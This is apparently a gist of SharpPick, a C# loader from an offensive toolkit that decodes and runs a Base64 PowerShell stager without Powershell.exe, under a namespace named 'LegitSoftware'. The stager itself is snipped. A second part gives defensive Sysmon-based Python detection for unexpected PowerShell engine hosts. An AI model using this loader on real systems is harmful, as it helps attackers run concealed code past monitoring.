Last active Jan 5, 2020
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run PowerShell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */
using System;
using System.Text;
//Adding libraries for powershell stuff
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace LegitSoftware
{
    class Program
    {
        static string RunPS(string cmd)
        {
            //Init stuff
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();
            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
            Pipeline pipeline = runspace.CreatePipeline();

            //Add commands
            pipeline.Commands.AddScript(cmd);

            //Prep PS for string output and invoke
            pipeline.Commands.Add("Out-String");
            Collection<PSObject> results = pipeline.Invoke();
            runspace.Close();

            //Convert records to strings
            StringBuilder stringBuilder = new StringBuilder();
            foreach (PSObject obj in results)
            {
                stringBuilder.Append(obj);
            }
            return stringBuilder.ToString().Trim();
        }

        static void Main()
        {
            // Base64 encoded launcher goes into the 'stager' variable
            string stager = "WwBSAEUARgBdAC4AQQBTA...[SNIP]";
            var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
            string results = RunPS(decodedScript);
        }
    }
}
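
A defender's view of the loader above, as an added example that is not part of the original gist: because the program hosts the engine through `System.Management.Automation` instead of starting Powershell.exe, the image load of that assembly by an unexpected process is the observable event. The sketch below checks constructed records that use Sysmon Event ID 7 field names; the allowlist, the simplified GAC path and the sample events are assumptions.

```python
import re

# Default install paths of the stock PowerShell hosts (assumed allowlist; extend
# it with any management tools in your environment that embed the engine).
EXPECTED_HOSTS = {
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
    r"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe",
    r"c:\windows\system32\windowspowershell\v1.0\powershell_ise.exe",
    r"c:\program files\powershell\7\pwsh.exe",
}
# The PowerShell engine assembly, as IL or as a native image (.ni.dll).
ENGINE_DLL = re.compile(r"\\system\.management\.automation(\.ni)?\.dll$", re.I)

# Simplified, constructed GAC directory used only by the sample records below.
GAC = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation"
# Constructed sample records using Sysmon Event ID 7 (image load) field names.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessId": 4312,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": GAC + r"\System.Management.Automation.dll"},
    {"EventID": 7, "ProcessId": 5120,
     "Image": r"C:\Users\Public\LegitSoftware.exe",
     "ImageLoaded": GAC + r"\System.Management.Automation.dll"},
    {"EventID": 7, "ProcessId": 6004,  # stock file name, non-stock directory
     "Image": r"C:\Users\Public\powershell.exe",
     "ImageLoaded": GAC + r"\System.Management.Automation.ni.dll"},
    {"EventID": 7, "ProcessId": 7100,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

def find_unexpected_ps_hosts(events, expected=EXPECTED_HOSTS):
    """Return (pid, image) for processes that loaded the engine DLL from an unlisted path."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        if not ENGINE_DLL.search(ev.get("ImageLoaded", "")):
            continue
        # Compare the full path, not the file name, so a relocated binary
        # that is merely called powershell.exe does not pass the allowlist.
        if ev.get("Image", "").lower() not in expected:
            hits.append((ev.get("ProcessId"), ev["Image"]))
    return hits

if __name__ == "__main__":
    for pid, image in find_unexpected_ps_hosts(SAMPLE_EVENTS):
        print(f"PowerShell engine loaded by unexpected host: pid={pid} image={image}")
```

Legitimate software that embeds PowerShell will also appear in the results, so the allowlist needs tuning before this is used for alerting.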